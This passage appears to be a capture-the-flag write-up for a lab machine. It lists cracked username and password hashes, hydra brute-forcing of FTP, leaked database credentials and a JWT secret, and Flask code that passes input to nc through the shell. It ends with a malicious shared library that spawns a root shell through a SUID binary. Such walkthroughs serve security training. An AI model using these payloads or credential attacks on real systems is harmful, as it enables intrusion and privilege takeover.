  "eugene_kreiger": "3955cb5285fef4dd8f248ca3b97e933b",
  "ahmed_gibson": "8915af36bc729f449664fd5a0c720c75",
  "clair.cronin": "93ccb8768bf9aacdec74de999e01a5bf",
  "sarina.hodkiewicz": "ee1439dfb65cc43814d8dc59fa90a339",
  "lavonne.schroeder": "fe1a46f519e9af9fa10b9d12f88b96d7",
  "dewayne.steuber": "ffc56ad16ada1bba47a8104956d67d71",
  "fernando": "1f1bcc2c1b44b07e2364f3741a47762e",
  "marques": "8e6f8704b029cae0e26636be1bce50ef",
  "brianne_heathcote": "4b6f19924e076f588844e91aa4caa089",
  "rachael": "32fc152051586ba48c5eb53d1f9bc11a",
  "alexandra": "ce7f915c0b543ed8d4b77a47dd24737c",
  "clementina": "0f5198cbc4b9a98548dbf946eb8c2168",
  "kathryne_kling": "9009e43a2805a6f1d45d3d9c59b3c130",
  "alexandre": "2d4b230e2240053c4d9ebb9613856908",
  "ivah": "2b0535023a614acafb7b7f5fbb91eb3b",
  "xander_schoen": "efbbd15b30cbfe2a206ca1291deca009",
  "shea": "d2736f6b7b47a40b1615af3ae419f6ab",
  "donny": "94e406b569e15565746d0a9592636f56",
  "jimmie": "4950c4c8e41c25a0c4cc913ff3f96ef1",
  "kathlyn": "34b8bce72871d15ced725cc1184f8f4a",
  "cleve_mckenzie": "4ae1a59c3cbaa065adbf26b904fa6781",
  "ashtyn.will": "d249b651702c68a2ed1fcfe2b4d99987",
  "presley.weissnat": "7b5168687749996ab74316a885e2b881",
  "marjolaine": "947c16a51f8e590debf7c9105d64c7df",
  "vivian": "ef0ca75e2d27434d2c4e02ac2c0f0c6e",
  "jennings": "41121d6da3615554ad0e0d01172634ba",
  "merritt_marks": "08ab1f602ea471e4e1a04f3934ec73e9",
  "efrain.hoppe": "31446ccc8161d50e2cecc133e0b11f85",
  "carol": "1f7374359d1456c11497aeaea408f84a",
  "genoveva_carter": "8838d8fd3db319f7a6a67d0ab5e52021",
  "jevon": "9e876fe23bd371b5bf7c07ca3f6d7634",
  "julia_monahan": "4c7fc2df5576ee3b68c5c79a755a0d33",
  "stanton_reynolds": "eed7a216ee2b9026591a29354acd3193",
  "tyrel": "150937304c73b4088c35c574d2f41f03",
  "carolyn": "4e2de8249eaeb94175a3e4824ff66c7c",
  "willow_mayer": "c65ea95f54056088f616601766eaa2db",
  "elenora_hahn": "919cff95c01cf51e2fd9a74db418c4bf",
  "jacinto.yundt": "ff5c237762ac41b30e59bc7b21042ba7",
  "aliyah": "20b4192f696213a8f4c7e5c7f84d60d1",
  "wade": "90346439328d6a4dd28af2b68acd5048",
  "leonel.marquardt": "ed98c3ce8aea0881334fe76de885dfc4",
  "marie": "7905c8fa4ede73a339906006b0e9c7c9",
  "jany": "a0a84994d69b3e738c1ac376df1dcabf",
  "vicky.hansen": "3e92536b0a568ede949bf1589bd16318",
  "arielle.sauer": "4bbe939fc8ac2d9bffc36aed5dacb9b1",
  "angelina.murazik": "aea180b10da81b62ffb6f35c033d99b1",
  "marcelo_brown": "f016e357657692aa181ca3cdfaf7b811",
  "eulah": "d772f9b38c9aa2d457c034d838c1be21",
  "jerrell": "1fe4031155a1412eb41f806740209cb0",
  "robyn_koepp": "edb235d64e26dfe7eecf820aeec20d09",
  "johnathon": "1cc714db88bbf5cd11ce6de641bf9e8d",
  "jacquelyn": "8189067a15ac1a5f5d57b6520b3c5c98",
  "nickolas.muller": "6bdde7ca2ab71fbb063c4d94ba7a0cb0",
  "lilliana_cummings": "c9c4cc2813f63b6da914965e41ba3476",
  "rachelle": "8d783621dfdb8722a80b5b10a45632ee",
  "lauretta": "eb462e1df69951cfb55d2cee556a49cb",
  "cordie.ortiz": "e12fa6b635222f258e1b0729755f3746",
  "rick": "0daa6275280be3cf03f9f9c62f9d26d1",
  "karl_hane": "1707c74ab5a1f96b9561a5b905b4f0f0",
  "gail": "5ae72fc8f3cb837ea4199362d70d7ae7",
  "adelia.berge": "bab4822dc29350a71e1015c916782713",
  "bud": "a994cdb47a8f661d7c091f84d4bd17ce",
  "rahul": "4b6d890ff0ba849d2724ace69db763c3",
  "stanford": "29de69a508e1f96a87898f50a564b9a6",
  "default": "c21f969b5f03d33d43e04f8f136e7682",
  "emie": "f519fdd188bb126dc912227a8163745c",
  "anna.bins": "10a6fffd7be7a218b2bd3507dc175dc5",
  "dane_wyman": "0ba31824ccdb1e133f79ad04f3855e40",
  "arne": "a791bbdf84fd98116c04246573d98e4a",
  "nat.wilkinson": "dcefd200f4856aeda1fc721a544fa717",
  "gerda": "377fc2d8b7c81f91708352491bc5d1e9",
  "roselyn_streich": "e32eebf5d2da2d61f08e5e4dfff04029",
  "d_murphy": "254e5f2c3beb1a3d03f17253c15c07f3",
  "jacynthe.kiehn": "bc8bb4c0f4ce272086b2cf02f6123f1d",
  "kianna_block": "bceee353497d21dad6b745d668d1ba3c",
  "manley": "be362c649da16df9d5a9fa854ddd3a24",
  "chaz": "648a629ea7ac036a9837e72da9f1fac5",
  "joanie_zboncak": "0297dc52c8540050dad5fc82aaa3026b",
  "adolph.kohler": "65b6d8708f1e865ca9378fec74407ce6",
  "dejon": "389bfdf3859555f26c28827583237c57",
  "dorcas": "2a9bed3bb2052c644a7f3130ddc78546",
  "benjamin.pfannerstill": "67b3ded77ab0a3f4eefd37a2ded00f48",
  "onie_kreiger": "0406b1f270012cdafac8fab92fb0ccd5",
  "jaquelin.medhurst": "63d75125cf5db3fe850cf359e0237992",
  "heidi_krajcik": "adf27575ef70c773fed3cd82fa06fa1f",
  "clement_cummerata": "4d71cd239acb3f9a5198159beaa05575",
  "tess": "389e03628382fb010c729319953e4c78",
  "lance": "b713cf03505e7e3b995f45f6df5e9460",
  "ursula.weimann": "e12e607e7bdd2105cc3d68c33c0d905e",
  "maximus_robel": "c3655a791fa65e0a75c849c1d56d66a1",
  "irma": "5177790ad6df0ea98db41b37b602367c",
  "lucie": "01971ddb0d362010a8e484f0630de1e9",
  "devon": "953155467fab407a18cb7c8f576d1ef6",
  "kory": "c40c83a8bd2914202bd22770405b0b4c",
  "keely.reynolds": "8b0b59e115aad4d3deee62b591c80b28",
  "adrianna": "3ceb64d1364a8c92134484029e4f2770",
  "jaylin.langworth": "f3e06518bbfa9d108ad30cf5628e480a",
  "agustin.kreiger": "a434c202f65475988efa9622a77f9594",
  "shaylee_roob": "81dbedf631f0dd59d00403c661972c0a",
  "zelma": "55f0db8276de5dc76d9b858bd0de78a0"
}

And we got a list of usernames and passwords. let’s crack them!

admin:2ac9cb7dc02b3c0083eb70898e549b63:Password1
d_murphy:254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
default:c21f969b5f03d33d43e04f8f136e7682:default
abbigail:9731e89f01c1fb943cf0baa6772d2875:piggy
aglae:0ef9c986fad340989647f0001e3555d4:misfits
ona:6f9ff93a26a118b460c878dc30e17130:monkeyman
alec:1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
rick:0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
wendell:eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
genevieve:fc7992e8952a8ff5000cb7856d8586d2:Princess1
demo:fe01ce2a7fbac8fafaed7c982a04e229:demo

Loggin in as admin (or as any other user) got us a list of all items in stock.

And from the page source we know that those values are loaded from a database: <!-- Debug... data tables were loaded from : MySQL DB --> but there is no way to tamper the script or access the DB.

From users and passwords tuple found before we used hydra to bruteforce logins on the FTP.

Connecting to the FTP we can read the first flag and enumerate the system since the FTP is not restricted and also we can connect to SSH with the same credentials.

From SSH we can now retrieve the server side code used to dump the credentials from memcache:

import re
from subprocess import check_output
from flask import Flask, render_template, request
app = Flask(__name__)

AUTH_ENABLED = True

def validate_cmd(cmd):
	match = re.match("^[a-zA-Z0-9 ]*$", cmd)
	return match is not None

@app.route("/")
def index():
	error = None

	if not 'password' in request.cookies and AUTH_ENABLED:
		error = "Access denied: password authentication cookie not set"
		return render_template("index.html", error=error)
	if request.cookies.get('password') != 'secret' and AUTH_ENABLED:
		error = "Access denied: password authentication cookie incorrect"
		return render_template("index.html", error=error)

	return render_template("index.html")

@app.route("/socket", methods=["GET"])
def socket_data():
	port = request.args.get("port", default="", type=int)
	cmd = request.args.get("cmd", default="", type=str)
	if not cmd or not port:
		error = "Missing parameters"
		return render_template("index.html", error=error)

	if port < 1 or port > 65535:
		error = "Invalid port"
		return render_template("index.html", error=error)

	if not validate_cmd(cmd):
		error = "Suspected hacking attempt detected"
		return render_template("index.html", error=error)

	data = check_output("echo '{}' | /bin/nc 127.0.0.1 {:d}".format(cmd, port), shell=True)
	
	return render_template("index.html", socket_data=data)

if __name__ == "__main__":
    app.run(host='0.0.0.0')

and MySQL credentials with JWT secret:

app = Flask(__name__)
app.config["MYSQL_DATABASE_USER"] = "dab_user"
app.config["MYSQL_DATABASE_PASSWORD"] = "kUi87_23$bxQsmk,a2"
app.config["MYSQL_DATABASE_DB"] = "dab"
app.config["MYSQL_DATABASE_HOST"] = "localhost"
app.config["SECRET_KEY"] = "todo_change_this"
app.config["SESSION_TYPE"] = "memcached"

But those informations are not useful to privesc from genevieve to root.

From LinEnum we saw that in /usr/bin/ there is a SUID binary called myexec.

From radare2 we can see that the program asks for a password (s3cur3l0g1n) and then calls sys.imp.seclogin that is defined in a library called libseclogin.so in /usr/lib.

function main () {
    //  6 basic blocks

    loc_0x400836:

  //DATA XREF from entry0 (0x40075d)
       push rbp
       rbp = rsp
       rsp -= 0x70              //'p'
       rax = qword fs:[0x28]    //[0x28:8]=-1 ; '(' ; 40
       qword [canary] = rax
       eax = 0
       movabs rax,0x306c337275633373  //'s3cur3l0'
       qword [s1] = rax
       dword [local_58h] = 0x6e3167 //'g1n'
       edi = "Enter password: " //0x400974 ; str.Enter_password: ; const char *format
       eax = 0
                                                   
       int printf(const char * format : 0x00400974 = Enter password:)
       rax = qword [s2]
       rsi = rax
       edi = "%63s"s           //0x400985 ; str.63s ; const char *format
       eax = 0
                                                           
       int scanf(const char * format : 0x00400985 = %63s)
       rdx = qword [s2]
       rax = qword [s1]         //"s3cur3l0g1n"
       rsi = rdx                //const char *s2
       rdi = rax                //const char *s1 ; "s3cur3l0g1n"
                                                   
       int strcmp(const char * s1 : 0x00177f98 = s3cur3l0g1n, const char * s2 : 0x00177fa8 =)
       dword [local_64h] = eax
       var = dword [local_64h] - 0
       if (!var) goto 0x4008b4  //unlikely
       {
        loc_0x4008b4:

      //CODE XREF from main (0x4008a1)
           edi = "Password is correct\n" //0x40099c ; str.Password_is_correct ; const char *s
                                                     
           int puts(const char * s : 0x0040099c = Password is correct.)
           eax = 0
           sym.imp.seclogin ()
           eax = 0
       do
       {
            loc_0x4008cd:

          //CODE XREF from main (0x4008b2)
               rcx = qword [canary]
               rcx ^= qword fs:[0x28]
               if (!var) goto 0x4008e1  //unlikely
           } while (?);
       } while (?);
      }
      return;

}

genevieve@dab:/tmp$ ldd /usr/bin/myexec
	linux-vdso.so.1 =>  (0x00007ffc1d5b0000)
	libseclogin.so => /usr/lib/libseclogin.so (0x00007f81cc3e7000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f81cc01d000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f81cc5e9000)

The library libseclogin although do not implement the function but will just prints:

seclogin() called
TODO: Placeholder for now, function not implemented yet

We can exploit this SUID binary writing a libseclogin.so that will setuid(0);setguid(0); and spawn a root shell.

#include <unistd.h>

__attribute__((constructor)) static void seclogin() {
    setgid(0); setuid(0);
    execl("/bin/bash", "bash", (char *)0);
}

We can save the crafter libseclogin.so in /tmp since from etc/ld.so.conf.d/test.conf we saw that we can use /tmp as a library path.

__attribute__((constructor)) is required to make the library run our function on startup (https://stackoverflow.com/questions/2053029/how-exactly-does-attribute-constructor-work).

The library is compiled with gcc -shared -fPIC libseclogin.c -o libseclogin.so.

Uploading the library in /tmp and running myexec we got a root shell and the flag!